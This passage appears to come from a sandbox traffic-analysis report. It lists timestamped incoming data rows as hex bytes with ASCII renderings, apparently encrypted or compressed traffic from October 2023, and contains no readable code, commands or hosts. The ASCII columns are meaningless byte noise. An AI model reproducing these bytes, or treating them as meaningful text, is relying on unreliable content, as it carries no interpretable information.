6a a5 3a 4f 4b 5c e9 ea 89 90 98 b0 6f e3 65 55 e1 43 58 57 fe 9e Data Ascii: +,z5=\|YTJXG2^G`P06zgAD3m*bCCQzVdrLXzk9l.A4LgIdH&Vglo.@Z$W4`n\|Bd&gt2^~UNQP']znev]jiu142<oI78uylrER;^;M0O[>j:OK\oeUCXW
2023-10-13 13:21:13 UTC	1224	IN	Data Raw: 67 36 2e 25 64 18 39 7a ef bb 83 cd 1d 8d 6b c7 c1 d5 80 21 cd b5 04 7a 6f 75 ee 33 0f f8 3c df 69 ba 02 30 f1 0c 6d ce b0 e4 eb 01 0f 97 a8 04 a1 54 7d b1 29 11 6b 27 06 76 c1 85 7b e0 47 fc e1 37 cf e9 2a 55 f9 6e 3d d8 74 14 77 7c 22 2c 70 c3 53 42 65 3d 9a 41 f8 03 2d 63 31 ce 11 54 1b f5 9c 34 93 31 89 60 7f 05 8e 31 80 35 4d c8 67 1a d9 1b 9b 2e f7 0d 74 18 c9 1f 27 91 df a1 44 de 3f 86 b4 aa 1c 81 f1 df f2 32 a6 5c b7 5d e9 b6 02 f9 bb ab 5e 29 1b 61 cb 01 7d 27 ed 1f d6 61 3d 2b b2 c2 20 9f d0 9c e1 a6 47 7a 30 a9 4e 94 8f 04 2b bc b2 d8 08 44 c4 a0 bb 91 1d ec c5 90 77 19 d3 8e 85 b2 ba 7e e5 41 4a 9a cc 32 e8 ff a0 75 18 70 11 f0 16 36 0b 9b 45 c4 29 37 9f 53 0d bc 80 d1 52 e2 37 3e 53 f3 b9 a9 9a 0d 10 45 92 70 8e 83 9a 45 e2 57 f9 21 e2 1f 50 Data Ascii: g6.%d9zk!zou3<i0mT})k'v{G7*Un=tw\|",pSBe=A-c1T41`15Mg.t'D?2\]^)a}'a=+ Gz0N+Dw~AJ2up6E)7SR7>SEpEW!P
2023-10-13 13:21:13 UTC	1240	IN	Data Raw: 7a e7 bb 52 09 cf 3f 35 de 5d a1 c8 c8 a5 b0 45 99 0e c7 5b 90 81 ba cf f0 2e 93 6d f3 5f 00 2b 2f d0 66 5c 0a 23 0a 63 2b c3 da 6c 6e 37 b7 95 24 48 39 7e f5 a4 99 f1 b9 8c ec b6 4a 38 38 2f 5a c6 0b 94 bb 23 54 c7 47 2a 05 e6 d5 59 39 90 2e c6 d2 83 cc 98 be 55 2f a4 cd e2 28 58 90 81 ac fe 73 fb 6f b1 57 f0 a3 7b a1 84 fb 5e 3e 7d 67 ce c4 6d 5d b9 34 ef 72 fb 63 0f 85 46 5b fe e1 fe 5c b6 61 4b 6b 92 71 7d ac ea 72 b6 95 07 12 4b 1e 00 73 70 b4 30 82 22 f6 6b 5d f2 4d df bf 1a a7 74 34 95 11 7d b8 b4 c4 ed 00 f0 6f 2c 16 1f fe 1c d3 a5 da 76 d0 ad cc 71 7d 60 7b 3a 3b 6b 3b 24 53 80 62 c5 aa 56 6a 5e 90 8c f8 1b 88 cf 9a d3 86 9c e2 02 34 21 06 11 51 aa 62 29 8b 9c 00 1c b5 92 bf a3 da 39 49 b7 ed a0 61 54 bc e7 39 71 ec 25 17 10 77 8e fa 42 8e 2d 08 Data Ascii: zR?5]E[.m_+/f\#c+ln7$H9~J88/Z#TG*Y9.U/(XsoW{^>}gm]4rcF[\aKkq}rKsp0"k]Mt4}o,vq}`{:;k;$SbVj^4!Qb)9IaT9q%wB-
2023-10-13 13:21:13 UTC	1256	IN	Data Raw: 65 93 6f 46 06 80 91 98 0f 61 b8 0d b8 05 96 d1 a4 f0 79 9f e1 1b 28 f9 6c 41 7b a6 30 57 da ba a6 67 ad db 23 d6 0c 55 d0 d6 3c 7a 54 34 93 fb c8 f6 57 a2 0b a0 a0 43 b9 78 bc c9 74 aa 64 d7 6d c1 c8 ce 18 8c 15 a8 5e 75 05 e2 b8 b3 0f a8 fd de 4c 2f ba 1e cd 4b f5 d3 ab 87 99 ed 76 c8 8b f8 12 98 70 0e d8 85 fe 52 b0 6d 43 a8 a1 89 d5 22 79 65 45 6b 28 95 4d 9d 78 02 e3 4f 2f 78 ce 45 33 85 f7 0a 45 a3 4c 73 1d 67 d9 84 a8 0b 86 ec 43 c7 24 d8 f7 b8 5d 29 e3 53 68 b3 62 82 41 88 d0 86 7a 37 17 03 4f d2 2b 6c 3f 64 a3 42 60 22 97 53 ef dd ed 31 f5 32 5d 53 c8 c9 4e ab 4b 72 70 52 de 03 d9 54 1a 0c 3d c6 b2 41 3d 78 ed 9d 72 a4 0d f7 22 46 c4 54 3f 76 f4 b2 a1 55 2d 7b 08 41 eb 31 51 13 43 fa a1 ad c9 bf 84 d3 4b ab 41 d6 be 43 74 8d 5f 22 1f 56 96 b3 c9 Data Ascii: eoFay(lA{0Wg#U<zT4WCxtdm^uL/KvpRmC"yeEk(MxO/xE3ELsgC$])ShbAz7O+l?dB`"S12]SNKrpRT=A=xr"FT?vU-{A1QCKACt_"V
2023-10-13 13:21:13 UTC	1272	IN	Data Raw: 33 70 b2 46 65 e2 5f 6b 33 b7 54 39 6e 00 b5 f9 ce 60 d4 9b ec 34 82 73 37 af 66 a4 ff 2e 47 a2 84 36 a7 70 bf 5d 18 97 dd c4 67 c1 b0 71 8c 32 4d ff 18 b8 86 ba 9e 3e 47 f1 03 ab 75 0b 60 ed 24 ef 96 ee 10 74 91 b6 b3 d6 38 b3 b7 33 3f 57 1d e9 15 a8 75 e5 e0 48 26 fa 2a bf b6 86 b9 3f 97 6d 1d 6a 2b 8c ff 01 e1 62 29 52 20 09 b9 1a 18 cd 0d 86 0f be 12 71 00 4e 2a d1 4f e5 7f e8 3d a9 bc 44 48 3a c6 7c 63 b4 d6 a4 2f e4 0c 29 b2 89 b3 7f 83 d5 70 87 78 13 59 af 4c db 25 27 c6 7b fc bd e7 a0 c9 a4 0d 1c 68 a9 03 d6 e7 8e 78 55 b9 5e 4d e4 3f 95 b7 32 f9 98 fd 89 f0 e3 dc f5 b5 e9 d4 43 67 2a 0c fd c3 26 a8 1f 02 dd d4 bb 87 29 f7 29 b5 fa ba e6 b9 51 04 dd 8c bf 47 47 0d 48 df e7 bc 7f e6 73 4a 74 98 cb 95 b0 f6 00 0b 42 4d 0b ee 26 7b 27 36 e4 ad 4f ba Data Ascii: 3pFe_k3T9n`4s7f.G6p]gq2M>Gu`$t83?WuH&?mj+b)R qNO=DH:\|c/)pxYL%'{hxU^M?2Cg*&))QGGHsJtBM&{'6O
2023-10-13 13:21:13 UTC	1288	IN	Data Raw: e5 dd fe 44 32 70 3f d9 d7 32 e4 e9 ad 76 95 05 3c 62 8d e5 27 4b e9 08 80 ec 44 c1 18 e5 97 9a 0a 52 11 ef 89 d5 ce 38 6c 26 7d e3 2e 4d f9 8c e1 b6 8d 28 36 fb d9 43 c0 3d 38 f4 05 60 a3 e6 d4 d6 4e a3 5f 75 18 6f 1b 64 af 28 ff 56 81 c9 7e 92 32 49 29 8f 64 2e 0b c9 6b 2a a1 25 f2 5d 59 00 08 f8 fb f3 d5 c5 01 33 2f e1 79 56 10 ae 0b af d1 6e c8 cf 0c 68 d2 e9 53 eb 4b 10 06 ba 31 19 0b 30 56 4f ba 8e a9 18 40 53 79 db 03 25 66 eb 31 69 98 e1 0b 41 fb 48 5e 17 ff d2 0a fb d6 29 37 74 26 c8 d3 4b 88 47 86 4f 12 5b d1 28 11 5f ac 23 15 37 16 ae 3a 4f bf 78 26 42 61 8b ea 9e 06 3c 11 21 d9 d3 ca fc e4 12 1d 80 02 94 f5 b6 4d 59 21 ee a9 c3 10 a4 fa 0c ae af 59 e5 58 d6 be 42 9b d2 92 f8 67 4d 98 b6 64 f9 01 e0 b7 aa 52 51 8b c9 08 8b b2 15 ee 62 cf 7e a4 Data Ascii: D2p?2v<b'KDR8l&}.M(6C=8`N_uod(V~2I)d.k*%]Y3/yVnhSK10VO@Sy%f1iAH^)7t&KGO[(_#7:Ox&Ba<!MY!YXBgMdRQb~
2023-10-13 13:21:13 UTC	1304	IN	Data Raw: 94 f8 37 a9 84 ac a2 1f 58 1f 7b ce 96 31 32 f4 fa 06 e4 66 ac 62 5d 23 8a 5c 18 26 62 a0 4a d7 85 ad ab fb 82 1d 6d 6f 69 99 76 14 fc dd 6e 91 1c 44 81 ad 2a 11 93 5d 7f 6f 59 a5 2c 47 81 96 b7 66 ee e4 a8 b9 93 28 07 de 27 95 9a 6d b2 f3 33 64 88 6f dc ce 00 a3 86 53 7a 65 d0 5a 0f af 8d d3 6f 64 95 bd 0e 31 8e 4d 00 c7 05 97 99 b0 0b 4a 7f 4d 41 7a 10 0b 33 c0 f2 05 9b e9 2d 22 24 fc 97 78 02 b2 c4 a4 42 8d 47 22 a1 80 21 80 c2 12 24 77 46 20 31 eb 79 e2 21 93 10 51 b5 11 c6 a6 59 a2 6b 7f 7d 82 a4 7b 5a 3e 21 7b 3b 12 8c ee c5 22 4f 8c 42 92 f3 f5 dc b2 8a 1c 1f c2 05 60 48 ba f8 04 e1 42 8d 73 ed 59 e2 59 a7 9e 41 e2 cb da 2e 33 86 a7 85 dd f5 ce 5a 3e 6e 51 43 3b b5 a7 88 ab c9 fe 07 89 9a 4b d0 77 8c 33 9a 6c 55 72 a1 04 1f e5 4c 23 a3 6a a5 0f 74 Data Ascii: 7X{12fb]#\&bJmoivnD*]oY,Gf('m3doSzeZod1MJMAz3-"$xBG"!$wF 1y!QYk}{Z>!{;"OB`HBsYYA.3Z>nQC;Kw3lUrL#jt
2023-10-13 13:21:13 UTC	1320	IN	Data Raw: a2 c6 d1 5b 08 fb ee 19 2d e0 0a 74 19 c9 ba 09 11 7f 43 a8 9f ef c3 2a 1c 99 e5 63 a4 8a 68 a1 b9 62 28 ad 01 72 6e 7e 16 15 6f a4 ba cc 5c 99 50 9e 57 8f db ee 91 03 17 14 11 89 60 34 24 01 2d 79 84 88 22 bd a4 9b 41 88 12 2c 52 9f 4c 57 38 48 51 bd 68 f7 10 16 0b 9f a7 d9 df 91 6b d7 5a dd 69 f3 5a 2f 65 d4 50 14 ae 8e 6a f3 72 3e 7c b6 89 da cc 9c c2 15 c2 f1 ad 9b 6c eb 86 d1 17 0e 76 b3 15 7e eb 4b 9b 2f da 0f f3 df 4c 9b 22 59 6f 55 cf 9e 6b a2 4d 3a 25 5c 25 6d cc 68 ae 4c 85 cc 7a 7d 4a 56 a6 42 9f 40 03 e2 c3 66 3a d8 a7 8a 7a 3e 24 8d 34 c1 cd dd d6 d0 ed 7a fe 3d 64 7f a0 e9 c5 2e 9e a7 4d 72 12 da 03 0a f6 ed f4 3c a5 ef 16 f6 06 f7 05 6d 8e 52 1d ab d0 5c 3e 9e 8c d1 f2 40 ab a9 22 e4 7a f8 bd 3f 33 fb b2 89 63 f4 42 59 56 96 83 0c a0 6d b5 Data Ascii: [-tC*chb(rn~o\PW`4$-y"A,RLW8HQhkZiZ/ePjr>\|lv~K/L"YoUkM:%\%mhLz}JVB@f:z>$4z=d.Mr<mR\>@"z?3cBYVm
2023-10-13 13:21:13 UTC	1336	IN	Data Raw: ec c7 51 45 13 a4 45 4c ae 31 88 85 98 c6 f3 c7 1a a1 f4 0e 8b 4b d9 dd c9 a2 b4 27 36 82 66 d0 15 63 6d 1d 5e 2b 94 d9 99 c6 02 cc b1 24 28 bd d9 be bf aa 4d 91 6c 31 14 24 7a e8 5f 35 2e 27 49 b4 e9 8f c4 82 bf c3 24 c7 24 14 30 69 7f 63 66 14 3a 44 e0 a6 1b 75 4e 48 d8 31 07 65 5c f1 5f 94 42 b4 31 a8 05 b9 52 07 b1 78 a2 f1 c4 ab c0 0f ba e3 78 77 f3 70 c1 f5 74 82 c0 78 8e 2a 71 34 76 ff 63 e9 83 9d 39 d0 2a a3 98 96 62 25 54 f9 09 e4 66 8c da a2 39 6e 18 8f 29 78 05 d9 a1 61 a4 2d 61 e7 d8 6f 4b 7f 30 61 2b 35 69 99 78 03 15 65 c1 fe 74 a7 0a 49 10 59 3e 8f 3d 3c e3 93 84 81 0a df c2 ef de 12 c5 64 d0 67 e1 c4 92 51 6c 6d 63 62 6a ae ec cc 84 b1 98 a4 76 47 c4 23 ee 69 91 4b fb 24 8d 93 11 3d da f5 0b b0 d6 5a a3 9a 54 fc 1a b1 0e 4e d5 a3 ea 26 38 Data Ascii: QEEL1K'6fcm^+$(Ml1$z_5.'I$$0icf:DuNH1e\_B1Rxxwptxq4vc9b%Tf9n)xa-aoK0a+5ixetIY>=<dgQlmcbjvG#iK$=ZTN&8
2023-10-13 13:21:13 UTC	1352	IN	Data Raw: 7d e4 e7 04 0e 74 c4 33 81 29 1e 46 74 15 19 e2 18 ff 01 a9 fe 94 a9 5f 47 a6 50 95 39 a5 25 d1 2e c8 0c e8 58 9e a9 75 74 69 04 c0 7a 84 14 15 4b d2 ae e8 9d c2 a4 60 44 48 1a cf 25 d9 94 60 96 26 4a d1 e0 5c 38 e7 c7 07 cd 75 ba 34 af cd 28 23 96 6d 35 38 5e 37 d1 08 56 ed 39 83 de 9b 8f 07 ae 63 94 fc 5b c2 22 82 7c 56 2a e3 30 1c bf 89 08 21 d4 21 fc 6c 1a 10 4a 03 05 7f 67 7e 7f 7f c6 11 a3 c7 49 79 8e 72 9c a8 8c ea 04 c2 42 3f d1 d7 23 4e 37 6f 46 4d 82 22 b8 75 64 7d 5e d6 c0 b5 34 79 b8 d1 2f e6 f5 0f c3 5e 4a 6a 2f c1 ff 0b 19 f9 a7 8a ea 6a c9 43 67 06 aa 47 4c 83 97 f4 5c 16 f9 db c8 cc 31 68 be 8b 7e 2c 53 fc ac 15 c4 e8 00 35 7b 8c 52 51 e5 52 00 d7 99 9f d9 e2 51 94 24 d0 95 d0 08 21 71 74 03 8e f6 37 50 e1 21 ae a9 5b 4f ed 4e b7 aa 20 27 Data Ascii: }t3)Ft_GP9%.XutizK`DH%`&J\8u4(#m58^7V9c["\|V*0!!lJg~IyrB?#N7oFM"ud}^4y/^Jj/jCgGL\1h~,S5{RQRQ$!qt7P![ON '
2023-10-13 13:21:13 UTC	1368	IN	Data Raw: e0 0c a3 c3 5a c7 4a 12 9f ba 74 06 b2 fc cb e4 48 e0 32 ab f9 73 d1 d0 2a 29 e3 20 98 b8 36 89 41 06 24 fb ac 3e 2a e1 50 c6 1e 20 08 b6 0c 30 d1 dc d2 c7 7a a7 bf 8c f8 fa 57 90 bc 42 38 1a b2 aa 3f 17 1c bf f7 8a d1 7c 91 c9 6d b9 a3 de 21 16 0d d4 f9 a2 09 1f f9 06 e9 70 11 29 7b 78 dd 23 d6 8c 35 c7 72 ab 13 3f 8a 4c e8 4f d2 67 7b 2a 7d 20 0d 68 97 95 30 5e 5d 5c 79 d0 b8 9a 8b 0d a3 1d 2b a5 76 cb 58 b3 91 99 20 ea 80 7e 7b 5e 3e 33 99 6e c1 cb b4 60 a4 22 32 ab 11 76 59 f3 10 0a b5 8a 90 64 90 a7 c2 89 fa 41 63 9d a7 43 3b 87 86 ab 4f 93 ef e0 7e 7b 2a 2f 6d 30 54 92 b4 23 3b c6 93 8c 95 8d 8c 8b 3b 7d bb 65 dd b4 4c 80 a2 1a d0 2b 38 f5 2c cb dd 42 79 79 82 d1 4f 7a 0c 54 67 27 9e d4 58 da af 8f 80 dc 2a 0c b3 59 65 52 5d cc 45 95 3f e8 12 45 be Data Ascii: ZJtH2s) 6A$>P 0zWB8?\|m!p){x#5r?LOg{} h0^]\y+vX ~{^>3n`"2vYdAcC;O~{/m0T#;;}eL+8,ByyOzTg'X*YeR]E?E
2023-10-13 13:21:13 UTC	1384	IN	Data Raw: d9 d4 5f 2b ad a1 e5 2b 85 cc 75 ab 5e dc 77 db b1 d7 a8 59 70 7f 47 f0 41 68 5d 0e 70 6e 43 52 47 14 2f 37 cd f9 01 0a a5 e4 1f fa 41 28 ac c4 11 e9 fd 6f 36 a6 2b 66 71 74 12 15 e3 8d e4 c2 aa 53 53 e8 d1 2f d8 8b c3 b7 09 36 96 b0 aa c1 0b 83 30 69 94 07 24 f3 59 58 9a df 45 24 67 40 b8 6d 5a 7a 30 93 40 8c 6f 90 df 84 61 97 f9 f9 66 60 46 4d 35 4a 2d 1f d4 c7 a4 b6 8d d7 16 28 c5 c3 f6 15 0b a2 e7 7e 8a 54 91 28 f4 35 09 45 2b 52 da 9d a4 f6 4b e2 3a 75 01 fd 8b 9b fb 6a 29 50 0d 61 c2 f7 f6 ec 05 ad 55 76 7e c6 22 ad 42 37 41 fb 88 cd 83 0f 36 fa 0d bd e6 7b d5 18 3f 32 53 fe cd f4 95 10 c1 27 03 e9 76 32 f2 ba 99 3b 11 f6 75 aa 74 97 42 a0 1d a3 bc 79 fb 1e 20 57 66 c0 34 99 10 6c a0 b9 cf 37 6f b8 32 db 1c 2e 84 6a 1d e9 f3 1b 46 a5 b7 e5 b4 6a af Data Ascii: _++u^wYpGAh]pnCRG/7A(o6+fqtSS/60i$YXE$g@mZz0@oaf`FM5J-(~T(5E+RK:uj)PaUv~"B7A6{?2S'v2;utBy Wf4l7o2.jFj
2023-10-13 13:21:13 UTC	1400	IN	Data Raw: f3 47 bc ec d1 db ab e0 b2 64 f2 d4 20 2a ba ad a4 42 79 48 70 d7 b1 04 f3 61 9d d4 72 bb a0 25 16 4f 30 60 06 aa a3 b0 3a dc 50 92 3a 8e cc 5c 5b 69 8f 9a 05 d9 1f ad 9a 75 cb bf 1b f0 34 3f d7 16 c7 8d 00 1a 30 50 2b 32 36 17 50 6f 86 03 02 62 67 68 54 2f 72 ae c8 b8 d9 d0 d0 94 e2 0a 29 64 7d db e1 69 b2 d5 0d 4d 9e 07 6e 34 6f 8d 79 41 e8 ec dc a0 5e 15 2c c5 fa ff 55 11 b8 72 7c 92 56 ad 34 a2 38 8b 7c dc a1 27 a0 81 e1 40 a6 c8 ba ad 77 6f 43 ec a6 7b 6b 9a 79 f5 9e 0b 57 b8 6d c6 1f d2 b6 e5 ac ba 65 0f 0f ca 69 86 71 b9 90 6d 2e 48 39 be 78 e1 10 c4 c3 c3 5e 2b cd 2b 04 40 7b 8d 4d 1a 5e 13 e0 b6 c4 bc 1d 6d d3 d1 92 80 43 ee c3 50 81 d9 86 c0 2d f2 3e d8 8e 66 77 aa 18 bf 3d f6 12 a0 53 ac d4 e0 fe 20 dc ea 39 14 d3 69 4f 38 e0 01 b3 c6 d4 3a 5e Data Ascii: Gd *ByHpar%O0`:P:\[iu4?0P+26PobghT/r)d}iMn4oyA^,Ur\|V48\|'@woC{kyWmeiqm.H9x^++@{M^mCP->fw=S 9iO8:^
2023-10-13 13:21:13 UTC	1416	IN	Data Raw: 52 76 6a cc 73 13 51 57 dd 15 36 6f 1c d8 de 90 a9 2f d7 0e 22 ca 4f fd df 97 b8 bf 82 be e3 8e ea f4 d4 9c b3 03 94 96 1a d7 13 42 90 51 cc 51 6f f7 4c 7a c5 ce 73 17 99 28 53 d4 21 da dc 33 2b 88 52 a1 61 44 ca 0f 25 d2 70 3d a2 71 85 e4 8c 85 c5 19 72 bd f5 77 cf 5e 6c cb 3b c1 70 b1 45 12 9f e9 ad 8c 45 6c 38 41 87 37 e4 f1 f5 65 59 51 25 ff 32 c3 33 8d 9d b2 88 82 4c 34 88 34 fc af 80 52 c6 a7 21 c0 80 7d 2e a1 06 d7 a0 e7 cc 44 11 21 ce 01 63 61 6d 87 07 d5 48 72 89 ad e6 91 00 66 ec 11 3f 3e 3e ce 45 8d 9c a7 e1 da 90 99 27 8b 56 2e 1a 44 19 24 c2 a7 28 ca 54 1c 63 15 5a 93 94 93 89 25 d5 04 e8 c0 63 fa e7 73 27 85 e8 97 e7 73 3c f1 36 55 f9 fe 5b 68 5b 10 d5 41 41 12 2b eb 02 97 5d 96 ca f1 fe e0 f9 95 5c 84 da 91 9c 8c 96 23 5b 57 93 c8 e5 32 1e Data Ascii: RvjsQW6o/"OBQQoLzs(S!3+RaD%p=qrw^l;pEEl8A7eYQ%23L44R!}.D!camHrf?>>E'V.D$(TcZ%cs's<6U[h[AA+]\#[W2
2023-10-13 13:21:13 UTC	1432	IN	Data Raw: 92 17 67 38 3d 69 24 81 bc 9a a6 62 32 85 14 6b e9 bd 51 50 e6 16 8a 0a f9 21 64 7e 91 9d de f0 de 0a 08 f1 5e 8b e3 49 99 cb c7 72 39 12 e7 a6 e0 04 14 a5 ad df 0b c0 d4 79 81 43 a3 d8 5e 94 7e 26 49 32 c5 e7 93 aa af 6d 64 01 56 3e 91 cf 57 e5 c4 51 f9 9e d8 cc cc c9 bb 77 69 dd a1 9a a8 6d ab 30 3a 7b 76 be 13 81 29 16 b6 cf 8e 12 a8 61 27 ce ca 4a 04 44 76 63 47 f7 cb 44 98 2a 93 66 5b 42 ac 10 65 8e 0d a3 fb c6 fc d0 20 73 b9 81 b6 ac d5 05 aa 7b 19 00 c9 6c 23 cb 2f 6c 42 5b ee bb f4 90 5c f6 c1 07 82 91 38 db 45 44 04 81 3e af e2 f1 bf 5d 71 c1 85 0d dd 1f bd 36 ea 4b a4 0f 23 12 3b 5d 26 fd fb ba 4b e9 43 e2 e8 bd f8 3f 64 10 2d 53 31 09 75 20 c7 4d 25 85 2d ce 69 d4 36 57 30 53 62 1b f7 2a 59 ea ab 67 4b 92 54 7b 38 a8 24 3e f0 c7 19 dd 08 5f 70 Data Ascii: g8=i$b2kQP!d~^Ir9yC^~&I2mdV>WQwim0:{v)a'JDvcGDf[Be s{l#/lB[\8ED>]q6K#;]&KC?d-S1u M%-i6W0SbYgKT{8$>_p
2023-10-13 13:21:13 UTC	1448	IN	Data Raw: 90 a0 c8 e8 fa bd a2 49 3b 2c fb 97 5d 4e 8d 3c 5c 67 34 55 1f 3a 64 04 66 e9 d8 3c 8d 18 1c aa bc 1a c2 44 13 d4 42 33 c3 fa 2d 3a b8 3b c2 c8 18 c0 46 51 55 fd 33 c8 89 58 7f 7f 5d 4c 83 41 a9 74 c4 e2 8b a8 89 eb 60 7e d5 eb f1 97 66 73 ef 4f 73 55 2c 3b 8c 21 92 c2 08 6f e0 74 a9 59 cd b9 5f d4 5a eb 46 59 00 a9 1b e6 a3 b7 ac ce de b0 43 4c b5 64 5c db 2c 94 4a 3b ea d0 00 46 99 24 a7 63 c0 97 01 88 7b 6c ae d7 27 bf 7f 54 8b 47 53 fc f6 7a 46 49 96 62 42 fe 72 a1 ab 63 20 06 9a 46 3b 7b 0c da ad 9a 55 b8 e3 f8 5a ff 71 7c f2 c9 77 ac 77 50 6d e3 6d bb af c9 65 94 98 90 fd d4 02 1a c3 20 5f 69 31 cd 7a 39 88 48 33 f4 fe 0c dc 40 c2 08 8a 4e dd 02 7b 73 74 04 cd c2 26 9f 0a 49 63 b2 bb f7 4e d9 fa c3 67 dd 07 61 8a 0a 45 b7 9c 81 a5 c5 12 47 e6 4c b3 Data Ascii: I;,]N<\g4U:df<DB3-:;FQU3X]LAt`~fsOsU,;!otY_ZFYCLd\,J;F$c{l'TGSzFIbBrc F;{UZq\|wwPmme _i1z9H3@N{st&IcNgaEGL
2023-10-13 13:21:13 UTC	1464	IN	Data Raw: da e7 d2 af 1d 56 4b 56 74 1f da 83 1d a9 64 60 e0 65 ea ab 9d 99 09 44 1c 3c 8c 7e 26 6f 26 c9 b4 34 c8 5a 6b 90 d3 da dc 95 08 16 a8 02 57 9d f2 f1 49 b5 63 13 66 7f 2d 75 1b 8a e5 94 0d 44 22 7a 91 5f 72 0d 08 94 80 2f a7 52 cf d3 27 5d f8 d2 a1 28 81 ee 37 b2 10 0f 2e dc cd fe ec 40 a0 b2 73 1a 27 8e 12 e2 52 58 a5 6a 88 35 69 f7 22 bb 73 e3 63 f9 f5 0c 37 6e e9 08 bb f9 e7 94 6c e3 c6 6d d8 d4 da 6a 38 bc 9c 45 65 78 bd 10 b0 0b 43 2f 9e 2a 1d 2c 96 f0 35 73 d8 49 f9 e4 0c b0 a8 21 67 75 f7 6d 11 b1 ec 93 c6 68 8c 0b df 59 c0 d6 90 ae 7b b9 95 d5 64 12 bc dd a0 34 0e f3 2a c2 a1 dc d0 ee 9f 6b 0b 65 33 06 de 91 f6 3a 95 d6 02 b6 82 92 71 28 28 cd 04 4e 9f 79 fe 4c 09 72 75 6f 03 44 ae 11 b7 02 7c d5 d6 c2 f4 6c 10 92 40 62 85 1b 31 45 db 62 48 38 9f Data Ascii: VKVtd`eD<~&o&4ZkWIcf-uD"z_r/R'](7.@s'RXj5i"sc7nlmj8EexC/,5sI!gumhY{d4ke3:q((NyLruoD\|l@b1EbH8
2023-10-13 13:21:13 UTC	1480	IN	Data Raw: f0 df 71 5d 3e 7a 5a 49 30 15 33 59 45 97 b1 22 21 c0 67 ad cd 2b f9 10 ff d7 4f 1e 4a 54 21 71 c6 c0 6a d6 2d 77 62 ce ac 54 ac d4 b1 d6 42 80 14 8c 8d ed a3 8d e3 89 33 60 29 9b 4b 94 ff ad e8 91 bd 13 df 76 13 f8 34 ff f3 c9 f4 63 a9 7f f1 c2 dd 12 3d 3d 34 a1 6f 21 2f e9 0e f0 ab 76 0e c0 42 29 4e ba 64 21 c1 b4 52 cf 55 1d c7 2f 9f ab 7d 80 5d ee 8e 95 6f db e9 c1 bb c5 a1 90 1f 42 2e 5f 72 a8 f0 a4 a7 0d 40 a6 31 7a f3 ce 62 f6 2f 17 50 c4 d7 9b 23 0d 0d 7f e4 88 1c 61 6c 37 bf 8e 4b 46 db bb 0a 4d 28 03 06 ca f3 b7 1f e5 d4 70 f6 96 ff cc 35 f4 31 d6 80 97 97 db 8a 4e 8d 56 e2 5b d3 69 1d c2 5b 13 30 31 6d e8 b2 94 23 2e ab 30 83 b3 f6 89 40 19 b6 e8 8e 9b de 37 d5 9c 1d 3b 1f 2d 7e fd e2 47 ea b3 ef e9 3d b2 f1 2d 0a 17 a5 5c 9b d5 d3 c3 b2 12 2b Data Ascii: q]>zZI03YE"!g+OJT!qj-wbTB3`)Kv4c==4o!/vB)Nd!RU/}]oB._r@1zb/P#al7KFM(p51NV[i[01m#.0@7;-~G=-\+
2023-10-13 13:21:13 UTC	1496	IN	Data Raw: d0 c3 ac ff c2 e3 25 fc 42 95 de c7 0f 74 da 6b 02 d1 18 48 75 c5 46 27 4f 51 0a a1 63 5a 05 89 4d 8e 8d ed 1b 11 ff 24 45 dc 00 d9 de b4 39 9d c1 27 f9 18 9a 86 2e 57 d2 37 56 2a e9 be 18 d6 e5 53 8a ce 8d e9 b1 84 75 09 94 37 27 fb 0a 2c c7 d1 0d 60 b3 a1 ec f4 1b e0 f1 44 1f dd f7 e8 f8 25 df ed 46 08 f6 b8 6e 77 60 b2 ba 5a 48 02 9c 1c 46 dd 7a e0 ae 30 9f 8e 0e 3c d4 75 2e 45 88 b9 92 25 ce f4 84 f9 0f a0 7a d5 5a a4 8e b7 49 be 7b 5f c8 01 71 68 4b bf 81 f1 44 c4 8c 53 43 ec 26 8e bf b5 c5 27 2a ce fb cc 7c f2 0b 0c dc 64 23 a6 bb 8c ea 82 0d 75 0a f6 50 18 46 8a 83 c8 e4 24 a7 6a 38 dd 32 6e 8e 91 e9 64 a1 23 4e c2 b8 e8 ef 6c be a7 7a f5 03 a9 f4 f8 f7 c3 81 65 d8 12 9f 24 1d 4b 72 1a d2 aa 49 98 1f 12 17 66 3b 41 e3 e7 d9 e9 85 61 e2 fd 8a 37 01 Data Ascii: %BtkHuF'OQcZM$E9'.W7VSu7',`D%Fnw`ZHFz0<u.E%zZI{_qhKDSC&'\|d#uPF$j82nd#Nlze$KrIf;Aa7
2023-10-13 13:21:13 UTC	1512	IN	Data Raw: 06 bf 9f 63 24 f4 d7 93 6b ab 43 16 40 01 3b 82 3e 45 35 b7 32 5c 1b 80 40 31 35 9d 77 d2 25 80 61 5e 82 ca 2f 90 8d 8e 33 08 b9 30 2f 11 df e2 fe 98 eb 86 24 0b 1c 26 15 ab b5 33 90 b2 c0 1e 6a c9 c1 4f 8e 5e 10 42 29 79 94 01 0a 9f fe b6 cd b4 b7 53 e5 d4 15 4e ce 18 7e 05 e5 15 e6 10 74 16 60 11 6f 8a a7 7d 07 d0 b4 a2 c3 b7 be 5c 41 1c db 10 7f 4f 0e dc 88 e9 fe b3 f9 88 0a 34 ed b3 51 72 59 69 44 bf 4f 92 12 90 ce 66 ee 19 2b ff f5 f7 9f f0 a6 47 3a 8b ba d4 03 ff 30 f4 40 fe f2 ca 84 53 49 23 3d 60 89 02 94 4f fd c3 98 9a f9 ee a3 56 96 54 dd 59 0f cc f2 40 af 15 c2 98 81 91 6a ff 8e 46 65 e1 6c da 9a fc 7a e1 06 b9 78 e4 ac fd 98 d4 d7 c5 3d 02 08 b7 90 d7 b3 03 ac 24 6c d4 e4 da e7 fd 19 66 b3 b9 a9 1c c9 8e 7a 33 02 2d 98 b3 0c 9a bd 4f 0d 37 21 Data Ascii: c$kC@;>E52\@15w%a^/30/$&3jO^B)ySN~t`o}\AO4QrYiDOf+G:0@SI#=`OVTY@jFelzx=$lfz3-O7!
